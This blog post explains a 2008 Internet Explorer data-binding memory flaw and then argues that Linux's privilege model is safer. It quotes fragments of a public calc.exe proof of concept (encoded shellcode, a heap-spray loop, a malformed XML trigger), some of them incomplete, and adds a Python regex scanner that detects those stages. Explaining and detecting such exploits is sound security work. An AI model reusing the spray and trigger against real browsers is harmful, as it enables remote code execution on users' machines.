It could be critical for previous versions of Internet Explorer too, but Microsoft didn't test them because they're no longer supported.
Being a curious type, when I saw all the hubbub about a new major critical vulnerability in Internet Explorer I wanted to know just what it was about.
First, the best way to get the fix for your Windows operating system, irrespective of flavour, is Windows Update. Yet, the text accompanying the update is typically brief:
Security Update for Internet Explorer 7 in Windows Vista (KB960714)
Published 18th December 2008
Update type: Important
Security issues have been identified that could allow an attacker to compromise a system running Microsoft Internet Explorer and gain control over it. You can help protect your system by installing this update from Microsoft.
While that doesn’t tell us much, the knowledge base article (or “KB”) 960714 referenced does spill the beans.
Fundamentally, it was discovered that program code of a malicious person's construction could be executed on your computer if a user views a specially crafted web page with IE.
In particular, a rogue script can allocate a block of memory (an array) and then apparently release it without the array's length being updated, meaning that the block of memory is still preserved.
Then, if data binding is enabled (which it is, by default), a rogue web page can take advantage of an incorrect handling of certain XML tags within IE to cause the browser to pass control to the supposedly free memory location.
If the script had pre-filled that memory with actual executable instructions then the author has effectively been able to cause your computer to do something of their bidding, under your user credentials.
You can find a harmless code example over the page which will make calc.exe (ie Windows Calculator) display itself. The code is merely presented in a readable format; it will not actually run.
This code snippet was published on exploit web site milw0rm.com and illustrates how the exploit works.
Now the program script itself; the shellcode object contains the machine code instructions to execute a process, running calc.exe.
Note, I have broken this line up for readability but you ought to ensure it is all one continuous line when pasting it into a text editor:
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
The next piece of script code sprays the heap: it fills large regions of memory with copies of the spray pattern followed by the shellcode, so that the address the browser is later tricked into jumping to is likely to land inside one of them:
var spray = unescape("%u0a0a%u0a0a");
do {
    spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
    memory[i] = spray + shellcode;
And here is the exploit; the following XML tag is incorrectly handled in unpatched versions of Internet Explorer and will cause it to pass control to the memory address of the array, and therefore execute the program instructions it contains.
This too should be one continuous line in a text editor:
xmlcode = "<XML ID=I><X><C><![CDATA[<image
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
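From the defender's side, the ingredients walked through above (a long %u-encoded unescape() blob, a doubling loop that grows a string to hundreds of kilobytes, an array filled with spray plus shellcode, and an XML data island bound to a SPAN via DATASRC/DATAFLD) are exactly what a web proxy or mail gateway can look for. The following scanner is an added example, not code from the original post or from milw0rm; the indicator names, the threshold and both sample pages are my own constructions, and the "shellcode" in the suspicious sample is placeholder %u4141 bytes, not real machine code.

```python
import re

# Each indicator corresponds to one stage of the attack described in the post.
INDICATORS = {
    # unescape() of a run of at least four %uXXXX groups (shellcode or spray pattern)
    "unicode_escape_blob": re.compile(r'unescape\(\s*["\'](?:%u[0-9a-fA-F]{4}){4,}'),
    # "s += s;" inside a loop bounded by a large hex length: the heap-spray doubling loop
    "spray_growth_loop": re.compile(
        r'(\w+)\s*\+=\s*\1\s*;.*?while\s*\(\s*\1\.length\s*<\s*0x[0-9a-fA-F]+\s*\)', re.S),
    # new Array() later filled with "x[i] = a + b;" (spray + shellcode per slot)
    "array_fill": re.compile(r'new\s+Array\s*\(\s*\).*?\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+\s*;', re.S),
    # an XML data island whose ID is then referenced by DATASRC=#ID ... DATAFLD=
    "xml_island_databinding": re.compile(
        r'<XML\s+ID=\s*(\w+)>.*?DATASRC=#\1\b.*?DATAFLD=', re.S | re.I),
}

def scan_html(text):
    """Return the sorted list of indicator names that match in `text`."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def classify(text, threshold=3):
    """A legitimate page may use one of these features; the attack needs all of them."""
    hits = scan_html(text)
    return ("suspicious" if len(hits) >= threshold else "benign"), hits

# Constructed benign sample: ordinary (if dated) IE data binding, no script tricks.
BENIGN_SAMPLE = '<XML ID=I><X><C>hello</C></X></XML><SPAN DATASRC=#I DATAFLD=C></SPAN>'

# Constructed suspicious sample following the post's structure; %u4141 is a placeholder.
SUSPICIOUS_SAMPLE = '''<script>
var shellcode = unescape("%u4141%u4141%u4141%u4141%u4141%u4141");
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++) memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[PLACEHOLDER]]></C></X></XML>" +
          "<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>";
document.getElementById("replace").innerHTML = xmlcode;
</script>'''

if __name__ == "__main__":
    for label, page in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(label, classify(page))
```

Scoring on the combination rather than on any single feature keeps false positives down: data islands alone were a supported IE feature, and unescape() alone is everywhere.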
Of course, while this example does nothing harmful, it has been noted that the vulnerability has been used to install Trojan horse programs elsewhere.
Microsoft offer instructions on how to mitigate the effectiveness of this vulnerability and, in so doing, indirectly espouse the Linux viewpoint on secure computing. Let me explain.
I won’t repeat the comments made by others that using a different web browser, such as Mozilla Firefox, will protect you from problems like this, but I will comment on something else.
That makes sense; if a user runs with administrator privileges, the rogue code can have full control of their system. If the user is unprivileged, then the attack surface is much smaller.
Nevertheless, it’s a pipe dream. Unlike operating systems like Linux which have always encouraged users to have “ordinary” accounts and only claim administrator privileges when needed, and only for performing specific tasks, Windows has trained its users – and worse, its legion of developers – to always run as the local administrator.
Vista’s UAC was intended to help mitigate this problem but proved unpopular due to the great number of programs which necessitate elevated privileges.
Perhaps the ultimate solution for a safe online experience isn’t to just change your browser but to change your OS also.
Give thought to Linux; it is safe by design. This design has lasted the test of time. This design is now a major differentiation between it and Windows.
Microsoft are hoping to undo their bad security design by re-educating their horde of users to a Linux way of life. This re-education isn't working, largely because any attempt to run within a totally unprivileged environment means the bulk of your programs no longer work.
Microsoft have to bite the bullet and obliterate the design goal of backward compatibility if they ever hope to genuinely have an operating system where administrator-level accounts aren't used for ordinary logins and usage. It's not going to be pretty.
Meanwhile, Linux just keeps soldiering on. It got it right from the start. Its users are accustomed to running sudo if they temporarily require higher access, as the following xkcd comic illustrates.